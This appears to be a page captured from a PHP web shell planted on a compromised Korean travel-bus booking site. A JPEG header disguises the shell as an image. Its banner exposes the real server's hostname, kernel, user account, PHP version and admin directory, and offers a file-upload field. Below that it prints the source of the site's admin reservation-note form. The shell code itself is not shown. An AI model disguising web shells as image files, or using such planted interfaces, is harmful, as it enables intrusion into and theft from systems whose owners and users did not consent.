ÿØÿà JFIF ` ` ÿþ
Server : Apache System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : tkt_travelbus ( 1137) PHP Version : 7.0.0p1 Disable Function : mysql_pconnect Directory : /tkt_travelbus/www/admin/res_good/ |
Upload File : |
<? include "../include/top_proc.html"; //공통파일 인클루드 ?> <div class="iframe"> <!-- 폼 --> <form name="frm_sd_ins" id="frm_sd_ins" method="post" enctype="multipart/form-data"> <input type="hidden" name="SqlType" value="contab_sd_write" /> <input type="hidden" name="tmp_layer_id" value="<?=$tmp_layer_id?>"/> <input type="hidden" name="res_no" value="<?=$res_no?>" /> <input type="hidden" name="mode" value="<?=$mode?>" /> <input type="hidden" name="cseq" value="<?=$cseq?>" /> <input type="hidden" name="nextloadwx" value="<?=$nextloadwx?>" /> <table width="100%" border="0" cellspacing="0" cellpadding="0" class="setting_write"> <colgroup> <col style=" width:15%"> <col /> </colgroup> <tr> <th><label for="">일시</label></th> <td><input type="text" name="ins_dt" id="ins_dt" class="input_text" style="width:596px;" value="<?=date("Y-m-d H:i:s")?>" readonly></td> </tr> <tr> <th><label for="ct_cont">내용</label></th> <td><textarea name="ct_cont" id="ct_cont"style="width:600px; height:200px; " hname="내용" required /></textarea></td> </tr> </tbody> </table> </form> <!-- /폼 --> <div class="btn_wrap_C mt30 mb30"> <a class="Bbtn red" href="javascript:;" onClick="ins_sd_frm();">저장</a> </div> </div> <script type="text/javascript"> function ins_sd_frm() { var f = document.frm_sd_ins; // 폼체크 var result = to_validation(f); if (result == false) return false; if(!confirm("저장하시겠습니까?")) return false; ajax_post("ajax_proc","../res_good/contab_proc.html","frm_sd_ins"); } </script>